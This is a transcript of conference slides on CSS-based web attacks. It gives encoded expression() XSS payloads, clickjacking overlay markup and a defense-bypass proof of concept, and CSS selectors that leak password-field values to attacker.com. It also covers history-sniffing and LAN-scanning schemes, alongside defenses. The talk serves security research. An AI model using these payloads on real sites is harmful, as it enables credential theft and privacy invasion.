Transcript The Sexy Assassin

The Sexy Assassin
Tactical Exploitation using CSS
CSS Presentation Overview
Old Attacks
New Research
New Attacks
Old Attacks - reloaded
Known attacks using CSS
XSS using CSS - Impact
Session riding/hijacking attack
Steal page data content
Exploit BoF/HoF/Memory Corruption/etc.
vulnerabilities
All other XSS threads
Expression XSS
CSS values can be escaped with backslashes
<div style=xss:e\xp\re\s\s\i\o\n(alert(1))></div>
Then further encoded with hex/decimal entities
<div
style=xss:e&#92xp&#92re&#92s&#92s&#92i&#92o&#92n(ale
rt(1))></div>
Following the CSS specification you can encode expressions
with hex escapes
<div style=xss:\65\78\70\72\65\73\73\69\6f\6e\28
\61\6c\65\72\74\28\31\29\29></div>
Expression XSS continued
We can also entity encode the previous vector
<div
style=xss:&#92&#54&#53&#92&#55&#56&#92&#55&#48&#92
&#55&#50&#92&#54&#53&#92&#55&#51&#92&#55&#51&#92
&#54&#57&#92&#54&#102&#92&#54&#101&#92&#50&#56&#92
&#54&#49&#92&#54&#99&#92&#54&#53&#92&#55&#50&#92&#55
&#52&#92&#50&#56&#92&#51&#49&#92&#50&#57&#92&#50&#57
></div>
External style sheet tricks
• Expressions can be executed in external style sheets
• We can encode the vector
• We can also encode the content
Importing expressions from a XSS file
<style>@\69\6d\70\6f\72\74 'xss.css';</style>
How can we encode the content of a style sheet?
<style>@import 'utf.css';</style>
UTF-7 Expression
UTF-7 encoded style sheet
@charset "UTF-7";
+ACoAIAB7AHgAcwBzADoAZQB4AHAAcgBlAHMAcw
BpAG8AbgAoAGEAbABlAHIAdAAoADEAKQApAH0Which produces:
* {xss:expression(alert(1))}
CSS Overlays (clickjacking)
CSS Overlays (clickjacking) Definition:
Convincing the user to click something, and use that click to do
something else (bad things)
CSS Overlays description
Attacker page
Original WebPage
_____________________________
(iframe)
_____________________________
_____________
_____________________________
Click here to continue
Button
_______________ ______________
_______________ ______________
_______________ ______________
CSS Overlays advanced attacks
• Multiple iframes nested
• Using offsets to gather a piece of a target site
• No opacity, filled white div regions
• Single sign on services vulnerable
• Combined Javascript and CSS tricks to intercept a click,
impossible to know until it's too late
CSS Overlays advanced attacks
Verisign case study
iframe performs a login request on site (ficlets.com)
<form
action="http://ficlets.com/signin/openid.signin"
method="post" id="openid-form" target="iframe">
<input type="hidden" name="openid"
id="openid-url" class="text-field"
value="openidtester.pip.verisignlabs.com" />
</form>
ficlets.com connects to Verisign provider
CSS Overlays advanced attacks
Verisign case study cont.
OpenID provider (Verisign) is now in our iframe
CSS Overlays advanced attacks
Verisign case study cont.
Using multiple iframes and div offsets we can cover the other areas
with solid colours and position the target area wherever we like
CSS Overlays advanced attacks
Verisign case study cont.
• Opacity can be used but solid fills make the attack harder to
protect against at the browser level
• Referer checking can neuter attack but not always available and no
implemented on most sites
• Referer can be faked
• David Ross idea to use a "clickjacket", accessible style sheet
which uses expressions to display a hover popup which appears
above other elements.
CSS Overlays Work Arrounds
Someone -> iframe-breaker
In some browsers (IE) JS can be disabled (iframebreaker-breaker)
NoScript -> Opacity disabled on remote iframes and embed content.
CSS overlays that don't require Opacity still work.
Michal Zalewski -> click if not obstructed
Still works against some no-opacity overlays attacks.
Mozilla -> Delayed disabled-buttons.
Still exploitable
David Ross -> X-I-Don't-Wanna-Be-Iframed-Please
Old browsers and websites still vulnerable.
Exploiting clickjacking defenses
• iframe hover state can be intercepted
• No way to tell if you're hovering over an external site
• Clicks can then be transferred to the iframe when a user clicks
<html>
<head>
</head>
<body>
<image ISMAP style="position:absolute;width:100%;height:100%;"
onmousedown="this.style.display='none'">
<iframe src="http://www.microsoft.com" id=x type=text/html
width=500 height=500 codetype=text/html id=x></iframe></image>
</button>
</body>
</html>
Exploiting clickjacking defenses
• Image intercepts the hover state
• Image is hidden onmousedown
• The click is transferred to the iframe because the mousedown state
is used, onmouseup we're in the iframe
More clickjacking defenses
• My extension to David Ross' click jacket
• Full metal click jacket
• CSS accessible style sheet is used to override browser defaults
with !important.
iframe,frame,object,applet {
border:1px solid #000 !important;
visibility:visible !important;
opacity: 1 !important;
filter: alpha(opacity=100) !important;
position:absolute !important;
float:none !important;
overflow:auto !important;
....
}
More clickjacking defenses
Advantages:
• Object styles are locked
• User can see clearly that it is a external site
• Javascript and CSS modification of styles have no effect
Disadvantages:
• Manuel Caballero hacked it :)
• Parent element allows opacity modification
More clickjacking defenses
Browser level CSS locks could prevent attacks
Advantages:
• Hard for attacker to exploit if external objects are clearly visible
and above everything else
Disadvantages:
• Designers would complain about limiting design ideas
• External objects would look ugly
• Could break existing sites
New Research
Algorithms
Arithmetics & Memory
- Check out Demos on http://p42.us/css
How:
element:condition{
action;
}
element: anything
condition: :visited, :active, :hover, :selected, etc..
action: background(remote request), display,
opacity, visibility.
Loops
- Check out Demos on http://p42.us/css
Recalc of style:
- META refreshes
<meta http-equiv=“refresh” content=“0;URL=#1”>
- -moz-binding
*{-moz-binding:url(“remote-req#id”)}
- webkit proposed CSS based animations (not very
useful)
@keyframes{}
Server Side Interaction
- Check out Demos on http://p42.us/css
Use HTML+XML data loading (just IE or just FFx)
MSIE HTC files, XML DATAFLD
moz-binding
Metarefreshes + Stylesheet update (it’s not cross-browser)
<meta http-equiv=“refresh” content=“0”>
Async stylesheet loading (doesn’t work on strict mode)
<element>
<style>@import”//url1”;</style>
<style>@import”//url2”;</style>
Multiple iframe loading (works everywere)
<iframe src=“site.com/”></iframe>
<iframe src=“site.com//”></iframe>
New attacks
Attacks possible thanks to the "theory"
CSS HTML Attribute Reader
CSS HTML Attribute Reader
How to read HTML Attributes using CSS, without javascript.
CSS HTML Attribute Reader
Advanced CSS3 Attribute Selectors:
For matching:
<input type=“password” value=“savedpassword”/>
• input{}
– Matches all inputs.
• input[type]{}
– Matches all inputs with an attribute “type”.
• input[type=“password”]{}
– Matches all inputs of type “password”.
CSS HTML Attribute Reader
Advanced CSS3 Attribute Selectors:
For matching:
<input type=“password” value=“savedpassword”/>
• input[type*=“swor”]{}
– Matches all input elements whose type attribute contains “swor”
(anywhere)
• input[type^=“pass”]{}
– Matches all inputs whose type attribute starts with “pass”
• input[type$=“word”]{}
– Matches all inputs whose type attribute ends with “word”
CSS HTML Attribute Reader
Attempts to read an attribute with [=] selector with help of the [*=]
selector!
Calculate the range of the chars in the value.
input[value*=“\x10”]{
background:url(“//attacker.com/?h=\x10”);
}
…
111 different variations
…
input[value*=“\x7F”]{
background:url(“//attacker.com/?h=\x7F”);
}
CSS HTML Attribute Reader – Try 3
To calculate the first letter if we asume from
the previews step that the range is [uiopasdf]
input[value^=“u”]{
background:url(“//attacker.com/?s=u”);
}
…
and so, 8 questions... u,i,o,p,a,s,d,f
…
input[value^=“f”]{
background:url(“//attacker.com/?s=f”);
}
CSS HTML Attribute Reader – Try 3
Once we found the first char (let’s say it was
d) we continue with [uiopasf] :
input[value^=“du”]{
background:url(“//attacker.com/?s=du”);
}
…
and so, 7 questions... u,i,o,p,a,s, ,f
…
input[value^=“df”]{
background:url(“//attacker.com/?s=df”);
}
CSS HTML Attribute Reader – Try 3
And so on. If we assume known attribute
length, but allow for repeats…
111+N^2 CSS rules
In the worst case for 8 chars: 175 CSS rules
In the worst case for 50 chars: 2,611 CSS rules
CSS HTML Attribute Reader
We can optimize this more, but at an implementation level.
First, we can use [^=] and [$=] selectors at the same time halving
the number of requests.
CSS HTML Attribute Reader
1
Detect the range
4
Detect third char
and sixth char
2
Detect first char
and eigthth char
3
Detect second char
and seventh char
5
Detect fourth char
and fifth char
6
Confirm we have
the correct string
CSS HTML Attribute Reader
Demo:
- Async stylesheet load attribute reader (read the contents of a text
field without js)
http://eaea.sirdarckcat.net/cssar/
Parallel discovery by Stefano Di Paola (WiSec) with
111*N complexity (888 rules for 8 chars)
http://www.wisec.it/
-1day (0Day-1) - Cross Site Styling
HTML5 Describes seamless iframes.
So HTML Attribute reading would be a vulnerability in a nonimplemented standard!
These will inherit all styles of the parent document (cross origin).
CSS will read content cross-origin!
Call for Microsoft's guys in the W3C HTML5 WG:
Stop this! make it same-origin only ;)
<style>@import”exploit”;</style>
<iframe src=“victim” seamless=“seamless”/>
CSS History Hacks
CSS History Hacks
Attacks based on the possibility of CSS of reading a browser's
History.
Visited boolean
Cross-browser
<style>
a:visited{background:url(//visited)}
a:not(:visited){background:url(//not-visited)}
</style>
<a href="http://website/">&nbsp;</a>
Impact Privacy
Counter-measures
Firefox: SafeHistory addon
IE: Disable history
Demo: http://ha.ckers.org/weird/CSS-history.cgi
CSS LAN Scanner
PoC:
CSS LAN Scanner
How it works:
Error pages don't create a log in the history.
If a website is valid, then it is marked as visited.
The scanner just visits a lot of LAN IPs, and checks
if they were marked as visited.
CSS LAN Scanner
attacker.com
Victim visits attacker.com.
10.3.22.111
Private webservice
victim
LAN intranet
192.168.1.254
Configuration router
CSS LAN Scanner
attacker.com
attacker.com tries to open a lot
of local ip addresses on
iframes, most will fail.
10.3.22.111
Private webservice
victim
LAN intranet
192.168.1.254
Configuration router
CSS LAN Scanner
attacker.com
attacker.com then asks which
websites appear as visited, and
so, those IPs are up.
10.3.22.111
Private webservice
victim
LAN intranet
192.168.1.254
Configuration router
CSS LAN Scanner
attacker.com
The victim responds attacker
with the visited IPs.
10.3.22.111
Private webservice
victim
LAN intranet
192.168.1.254
Configuration router
CSS LAN Scanner
attacker.com
attacker.com then tries to guess the
service on those IPs based on ports, and if
necessary, the content of remote
Stylesheets
10.3.22.111
Private webservice
victim
LAN intranet
192.168.1.254
Configuration router
CSS LAN Scanner
attacker.com
attacker.com then sends CSRF attacks
against the detected software behind the
LANs.
10.3.22.111
Private webservice
victim
LAN intranet
192.168.1.254
Configuration router
CSSH - CSS Stealing Some History
CSSH - CSS Stealing Some History
History Crawler + Navigation Monitoring!
CSSH - History Crawler
digg.com
twitter.com
slashdot.org
attacker.com shows a
lot of possible websites
that the user may have
visited.
hi5.com
myspace
attacker.com
google news
msn.com
del.icio.us
live.com
sla.ckers.org
Redtube
facebook
Victim 
CSSH - History Crawler
digg.com
twitter.com
The victim responds the
attacker with the
websites visited.
slashdot.org
hi5.com
myspace
attacker.com
google news
msn.com
del.icio.us
live.com
sla.ckers.org
Redtube
facebook
Victim 
CSSH - History Crawler
Link #1
Attacker fetches the
links of those websites,
and asks which ones are
visited.
Link #2
attacker.com
Link #3
Link #4
Link #5
Link #6
The victim responds,
and the exploit asks
again endlessly.
Victim 
CSSH - History Crawler
This way we can effectivelly crawl commonly visited websites of a
user.
The privacy implications of this are huge.
This attack is not a secret, it was described in Mozilla’s bugtrack by
Paul Stone:
https://bugzilla.mozilla.org/show_bug.cgi?id=147777#c78
CSSH - Navigation Monitoring
What if...
We could detect in real-time the navigation of a user using our
history crawler?
Might this be possible?
Yes 
CSSH - Navigation Monitoring
Attacker 
Victim visits attacker.com
Victim 
CSSH - Navigation Monitoring
Attacker 
attacker.com sends exploit to user, and opens digg.com.
Victim 
digg.com
CSSH - Navigation Monitoring
Attacker 
The exploit detects that digg.com was visited, so it
alerts attacker.com, and attacker.com fetches the
links on digg.com.
Victim 
digg.com
CSSH - Navigation Monitoring
Attacker 
Then, the attacker updates the exploit, and
start asking for each link if anyone of them
are visited.
Victim 
digg.com
CSSH - Navigation Monitoring
Attacker 
When the user finally clicks on a link,
the exploit detects it, and alert’s
attacker.com
Victim 
digg.com
cnn.com
CSSH - Navigation Monitoring
Attacker 
attacker.com fetches all links on cnn.com,
and updates the exploit asking wether they
where visited.
Victim 
digg.com
cnn.com
CSSH - Navigation Monitoring
Attacker 
Repeat above steps indefinitely.
Victim 
digg.com
cnn.com
CSSH - Navigation Monitoring
Public Demo :
http://eaea.sirdarckcat.net/cssh-mon/
Cross-browser.
Thanks
We would like to thank:
Bluehat team, David Ross, Robert Hansen,
Jeremiah Grossman, Giorgio Maone, Alex K,
David Lenoe (Adobe PSIRT), Google Sec. Team,
Stefano DiPaola, and everyone else that asisted in
any way our research.